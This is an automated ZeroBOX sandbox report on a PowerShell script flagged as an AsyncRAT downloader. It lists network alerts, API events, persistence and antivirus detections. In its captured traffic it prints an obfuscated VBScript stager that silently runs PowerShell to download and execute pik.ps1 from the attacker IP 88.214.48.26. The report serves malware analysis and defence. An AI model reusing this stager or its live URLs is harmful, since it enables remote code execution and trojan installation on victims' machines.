Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 28, 2025, 10:09 a.m.	April 28, 2025, 10:13 a.m.

Size	1.3KB
Type	ASCII text, with CRLF line terminators
MD5	`a96761c1e3bed0f2c2f8e2d616f60d40`
SHA256	`520e0f5ca64d3c0b697d74da92af56766f13c04b0fa9f19c5bb23561160644c9`
CRC32	`39595AEE`
ssdeep	`24:DFCJlXNvzkgVdy9irykV9Qd6HrYORNO37Jx2xmfS02dguLCASxyFP37ZtSNjW+Io:DFCPNvAJiNLQd6H8gE7J88sd9L1F3lt2`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\namen.ps1
2552

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
88.214.48.26	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49164 -> 88.214.48.26:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 88.214.48.26:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 88.214.48.26:80 -> 192.168.56.101:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 88.214.48.26:80 -> 192.168.56.101:49164	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 88.214.48.26:80 -> 192.168.56.101:49164	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 88.214.48.26:80	2027260	ET INFO Dotted Quad Host VBS Request	Potentially Bad Traffic
TCP 88.214.48.26:80 -> 192.168.56.101:49164	2026995	ET HUNTING PowerShell DownloadString Command Common In Powershell Stagers	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW April 28, 2025, 10:09 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (8 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly console_handle: 0x00000023	1	1
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: '501664 bytes loaded from System.Management.Automation, Version=1.0.0.0, Cultu console_handle: 0x0000002f	1	1
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: re=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An att console_handle: 0x0000003b	1	1
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: empt was made to load a program with an incorrect format." console_handle: 0x00000047	1	1
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\namen.ps1:30 char:46 console_handle: 0x00000053	1	1
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: + return [System.Reflection.Assembly]::Load <<<< ($bK) console_handle: 0x0000005f	1	1
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000006b	1	1
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000077	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey April 28, 2025, 10:09 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c91d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:09 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c91d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:09 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c91d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:09 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c91d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:09 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c91d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:09 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c91d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 28, 2025, 10:09 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://88.214.48.26/tpnl98/ret.exe
suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://88.214.48.26/tpnl98/nums.vbs

Performs some HTTP requests (2 events)

request	GET http://88.214.48.26/tpnl98/ret.exe
request	GET http://88.214.48.26/tpnl98/nums.vbs

Allocates read-write-execute memory (usually to unpack itself) (28 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02069000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05610000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05611000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05476000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05477000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05620000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05478000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05479000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0aaf0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0ac50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0ac51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0ac52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0ac53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0ac54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05612000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05613000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05614000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05615000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05621000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Windows\Temp\nums.vbs

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 28, 2025, 10:09 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (5 events)

Data received	(((( ( ((( ((((((((((((((((((( (!("(#($(%(&('((()((+(,(-(.(/(0(1(2(3(4(5(6(7(8(9(:(;(<(=(>(?(@(A(B(C(D(E(F(G(H(I(J(K(L(M(N(O(P(Q(R(S(T(U(V(W(X(Y(Z([(\(](^(_(`(a(b(c(d(e(f(g(h(i(j(k(l(m(n(o(p(q(r(s(t(u(v(w(x(y(z({(\|(}(~(((((((((((((((((((((((((((((((((( (¡(¢(£(¤(¥(¦(§(¨(©(ª(«(¬((®(¯(°(±(²(³(´(µ(¶(·(¸(¹(º(»(¼(½(¾(¿(À(Á(Â(Ã(Ä(Å(Æ(Ç(È(É(Ê(Ë(Ì(Í(Î(Ï(Ð(Ñ(Ò(Ó(Ô(Õ(Ö(×(Ø(Ù(Ú(Û(Ü(Ý(Þ(ß(à(á(â(ã(ä(å(æ(ç(è(é(ê(ë(ì(í(î(ï(ð(ñ(ò(ó(ô(õ(ö(÷(ø(ù(ú(û(ü(ý(þ(ÿ(((((((((( ( ((( ((((((((((((((((((( (!("(#($(%(&('((()(*(+(,(-(.(/(0(1(2(3(4(5(6(7(8(9(:(;(<(=(>(?(@(A(B(C(D(E(F(G(H(I(J(K(L(M(N(O(P(Q(R(S(T(U(V(W(X(Y(Z([(\(](^(_(`(a(b(c(d(e(f(g(h(i(j(k(l(m(n(o(p(q(r(s(t(u(v(w(x(y(z({(\|(}(~(((((((((((((((((((((((((((((((((( (¡(¢(£(¤(¥(¦(§(¨(©(ª(«(¬((®(¯(°(±(²(³(´(µ(¶*(·
Data received	(¸(¹(º(»(¼(½(¾(¿(À(Á(Â(Ã(Ä(Å(Æ(Ç(È(É(Ê(Ë(Ì(Í(Î(Ï(Ð(Ñ(Ò(Ó(Ô(Õ(Ö(×(Ø(Ù(Ú(Û(Ü(Ý(Þ(ß(à(á(â(ã(ä(å(æ(ç(è(é(ê(ë(ì(í(î(ï(ð(ñ(ò(ó(ô(õ(ö(÷(ø(ù(ú(û(ü(ý(þ(ÿ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( (! (" (# ($ (% (& (' (( () ( (+ (, (- (. (/ (0 (1 (2 (3 (4 (5 (6 (7 (8 (9 (: (; (< (= (> (? (@ (A (B (C (D (E (F (G (H (I (J (K (L (M (N (O (P (Q (R (S (T (U (V (W (X (Y (Z ([ (\ (] (^ (_ (` (a (b (c (d (e (f (g (h (i (j (k (l (m (n (o (p (q (r (s (t (u (v (w (x (y (z ({ (\| (} (~ ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( (¡ (¢ (£ (¤ (¥ (¦ (§ (¨ (© (ª (« (¬ ( (® (¯ (° (± (² (³ (´ (µ (¶ (· (¸ (¹ (º (» (¼ (½ (¾ (¿ (À (Á (Â (Ã (Ä (Å (Æ (Ç (È (É (Ê (Ë (Ì (Í (Î (Ï (Ð (Ñ (Ò (Ó (Ô (Õ (Ö (× (Ø (Ù (Ú (Û (Ü (Ý (Þ (ß (à (á (â (ã (ä (å (æ (ç (è (é (ê (ë (ì (í (î (ï (ð (ñ (ò (ó (ô (õ (ö (÷ (ø (ù (ú (û (ü (ý (þ (ÿ ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( (! (" (# ($ (% (& (' (( () (* (+ (, (- (. (/ (0 (1 (2 (3 (4 (5 (6 (7 (8 (9 (: (; (< (= (> (? (@ (A (B (C (D (E (F (G (H (I (J (K (L (M (N (O (P (Q (R (S (T (U (V (W (X (Y (Z ([ (\ (] (^ (_ (` (a (b (c (d (e (f (g (h (i (j (k (l (m (n (o (p (q (r (s (t (u (v (w (x (y (z ({ (\| (} (~ ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( (
Data received	!ÿê¬oò¬Ðú¬¡ÞdZ L4¬"WóaK2DÆ: BxmJRPZCRb§jºr zRAkÖ,¯V¢ðªbÐ²ü9º%ÂõBÊuÒ>ÚâêÆ\|ò¿ úAÇ®v+ ®çú®h^®£"®Ò®ú}2®yt:®!B®åJ®ðR®(wZ®LOb®3j®Ã r®Îz®#®>®½ï®< ®À¢®Âª®²®º®8èÂ®ØÊ®ÖÒ®ö®Ú®ãaâ®"1ê®ñò®É²ú®Õ8¯Òè ¯Hò¯/ ¯z"¯¨¯12¯.8:¯D%B¯×J¯ÕR¯° Z¯Õb¯Ãåj¯ér¯Hz¯¯¯Ê¯9¯}¯Ï¢¯¶>ª¯Ç²¯uº¯Â¯ÊbÊ¯³Ò¯û¸Ú¯¼Êâ¯(ê¯ÛÐò¯6`ú¯Uí°N? °@y°¢j°"°+Ð°Kq2°Ôº:°xÇB°úJ° ïR°>Z°A&b°j°áör°uµz°;°¯Á°ø°Ü°ä#¢°¼?ª°NG²°Eºº°çCÂ°ÁÊ°ýÒ°ÔÚ°ôâ°¶ýê°l'ò°Tÿú°6W±ºW ±ØÉ±XÎ±èÊ"±FO±v2±R`:±ÙjB±"J±ÔJR±\|Z±9%b±ñj±]!r±9ìz±s±ë×±±±#ç¢±=ª±Ï²±¦cº±ÇÂ±XäÊ±pÀÒ±¨]Ú±Lâ±¯ê±Ã ò±`Ïú±U²²" ²·²I²Â"²þX*²92²:²!B²¤9J²AR²×Z²2b²cj²ÿCr²«Lz²oØ²»T²¾h²½"
Data received	xHvtpxzDufxHrqgafoWgxHDiOPtAlsxHDErAanCwxHjBwkYHRGyHLYLvsEqJyHVMPqrTjdyHTVazNOJBzHIbuOKuBWzHqOlIecVWzHDBDmXDGfzHXvOVvZvDAIyUFQAaKzAITYNhOrjIBIvBEugaYQBIHAaXrEfVBINjVnbrTeBIYHlzwWmJCIhtmKgjiLCIEpzMQmuWCIwvcJjdjhDIJMNjVLVpDImDQWitcrDInjSIFZsrDItNWeebzzDIcMASsMZYEIsLsAnrLbEINPvGNEygEIjOgPTOKRFIBpiNAVMbFIjjXNEvInFIaEKSZBwoFIjyHiTjBMGINreImZVfGILPzhSGfkGINzeiPeVcHIhqpdVKeGIIVZGYZYiJIItgxHmiOUIIbKrvSsSYIITnDZgdVvIIHiATwClUJIcNzFKWgdJIVvOdKPBrJIzccJJgfJKIIlVmkFBMKIrALlNcFMKISmEWkHiQKIuiuQsiNYKIXQUTIykZKIobLZuxqZKIXYNPrQEpKIQloWhxosKIlJICyaStKIlPcPxpNeLIxyYZNogfLITmLhKPVhLITxamLRwnLIssAnPjbwLIZfiZSLUCMIqilGdSXMMIkwqqxZUNMIPcPdkRCVMIGcFITNEzMIXMRQTntLNIDUUBaigPNIWkRxejcQNIyCovzWoZNIasSbeVRcNIScjiLHVdNIskmrGETwNIeBgDCBWJOINUBhiCqOOIXngWhWBiOIjGhMbeyjOIyrvxQwymOIAjZsRJQDPIuyJiTofZPIXHJkwbLhPIHYWZqKGoPIPjhfCQZoPIQPWFosChQIAXPPLoviQIqisHSmKlQIyebUBbGqQIiHXIqyKzQITmgQUoDBRIKxTLktWCRIEdgmspwCRIKGjUTOKDRITeAXmJjIRIPbmPKFMkRILnyDJFJlRIXfDgVMtoRIQGkFoIkDSIKcgVgElDSImODlwcBJSIpDUIissSSIKpaalCfzCWJYYYTJIzxtayiVtGDnDvKSlqfvbyJFyZifAyIPchQKYwXlgfHFYRWhmRNISxIjQSUaqdvUXOlwFaUOtToWReGHdbSIxTtEbmrCTIHIKYnuFFTIILhUpgDlTIQJBxDPclTIRXDRooorTIWwOWGdJsTIgHhSmClAUIvgxYkLCLUIqxFxoXvNUIJnztMqvYUIpHkHrHjsUIXEObJmrQVIhGpMrHTYVILyihATdYVIejFngPVPWIEyjeZNZPWIvsFNmOLTWIcPeailkAXITnHkKLUOXIDMazLBCbXIjZTsJfJnXIhJJJtasxXIrVDBHzsMYIsoCYYRWOYIkXLMfdbYYILbnbKEvZYIPPSBSPNeYIYFyGHucmYIEXSmDxQnYIRXiCeGerYIMPSPcxzxYICugnAiJHZIFUvmLUQIZIiRdKroyKZIalAQuqmTZIrIdNJxKWZIpEqYnPylZIysDKVbVvZIUhealUiAaIyQBOAYNLaIiFilUQTQaInXHQysStaIqEqOWVXEbIkdqGHTFKbINRxJkIvLbIwHKPLnCnbIpacquotrbIpFdmvugHcIVVouWgPWcIPoGzhifncIXAaTgsEqcIahONSgNrcIhVAFsOEycICtsIoXiEdIuebXIsnKdIHPmjapabdIychBMEUedIXVYSmJSrdIvMxzJxtAeIsFgrTNuMeIvTiZHsnWeIQkXPAtEoeIeFnruOSEfIRMrBOvqgfISByFOzvcgIAMBuGlcrgIDVDXkdsugIfJgsDezChICbZdVQNDhIkCbkGnuQhItvMThHBehIKvCbRbGlhIeZrZYcVxhIUbyxvHwIiIGwrcflmNiIpwSlCIajiIiznhtMNxiIQCCVlUWCjIWiSeKCGGjITfEesKmfjIKzldYKUwjIccVtXaQFkIJyAQxHgOkIGfYADdgQkILKCwQLapkIYYhNriEBlIXcyHUNnNlIDlPlBckPlIkjUaYxHVlIStGXPpbWlImCHbRgYglIQDUUPgrImIRcroeSCtmItquuvPbvmIJBZynbsUnIeVmtfTZZnInkYMzVpqnINLSoTGCMoIapyBhXzVoIZLjRfxHnoIJcqpwQcOpIEzvoOdccpIGDaCQSxfpIbmVxUaptpInlAhDMxxpIuAiJdAGCqIWZBxXdpCqIjsuJNlGEqInuEqWIyNqIVpjfTTnrqIYleQnjWtqIKHWEDQXDrIHYdDkhxGrIUnAeWqfNrIdnJxejxXrICNsBZQherIuDCsptAkrIrpLGEcwprIyBYYmvHvrIawSbiDkwrIGgKCVGAyrIGgHGxmSAsIUHiDHRpAsIZqLjWvNBsINuomvJlFsIQUAUQdUusIObIQCLNBtIYgYvcTfNtISDnJsuNPuIXRoWGgUXuIqAAAjvOouIikoVOSkzuIGuUmEdUEvIvXixwTQTvIQtshiHSTvIdxmERrdXvIxPwnbfybvIlBpifXflvIWJtnbBoovILxloWWZsvIdyqAjbhCwItkOuYhIOwIEmSWOitkwIEVvHjBMvwIVsCjyQDxwIdcWLtDOBxIMVILlousxIMcjWNyjByIGbRffUjEyIykJQjkZLyIdBFHlImayIzqzRblYgyIorfIjpwxyIrNHWSAXjzIctOxxVjqzIMjKIFautzIMYxSXPZzzIKfgckcJSAJ
Data received	HTTP/1.1 200 OK Content-Type: text/vbscript Last-Modified: Wed, 23 Apr 2025 20:40:56 GMT Accept-Ranges: bytes ETag: "18b8aa390b4db1:0" Server: Microsoft-IIS/10.0 Date: Mon, 28 Apr 2025 06:12:31 GMT Content-Length: 422 Set xAbcYz = CreateObject("WScript.Shell") q1 = "powershell" q2 = "-Command" q3 = "$" & Chr(97) & "x = New-Object Net.WebClient;" q4 = "$" & Chr(98) & "x = $" & Chr(97) & "x.DownloadString(" q5 = "'" & "http://88.214.48.26/tpnl98/pik.ps1" & "'" q6 = ");" q7 = "[ScriptBlock]::Create($" & Chr(98) & "x).Invoke()" finalCmd = q1 & " " & q2 & " """ & q3 & q4 & q5 & q6 & q7 & """" xAbcYz.Run finalCmd, 0, True

Poweshell is sending data to a remote host (2 events)

Data sent	GET /tpnl98/ret.exe HTTP/1.1 Host: 88.214.48.26 Connection: Keep-Alive
Data sent	GET /tpnl98/nums.vbs HTTP/1.1 Host: 88.214.48.26

Communicates with host for which no DNS query was performed (1 event)

host

88.214.48.26

Installs itself for autorun at Windows startup (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\App.url

File has been identified by 14 AntiVirus engines on VirusTotal as malicious (14 events)

CTX	powershell.trojan.asyncrat
VIPRE	Trojan.GenericKD.76289507
Arcabit	Trojan.Generic.D48C15E3
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan.PowerShell.Generic
BitDefender	Trojan.GenericKD.76289507
MicroWorld-eScan	Trojan.GenericKD.76289507
Emsisoft	Trojan.GenericKD.76289507 (B)
Google	Detected
Antiy-AVL	Trojan[Downloader]/PowerShell.AsyncRAT
Microsoft	TrojanDownloader:PowerShell/AsyncRAT.YTS!MTB
GData	Script.Trojan.Agent.VR9C51
Ikarus	Trojan-Downloader.PowerShell.AsyncRAT
AVG	Script:SNH-gen [Trj]

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send April 28, 2025, 10:09 a.m.	buffer: GET /tpnl98/ret.exe HTTP/1.1 Host: 88.214.48.26 Connection: Keep-Alive socket: 1544 sent: 76	1	76	0
send April 28, 2025, 10:09 a.m.	buffer: GET /tpnl98/nums.vbs HTTP/1.1 Host: 88.214.48.26 socket: 1544 sent: 53	1	53	0

namen.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All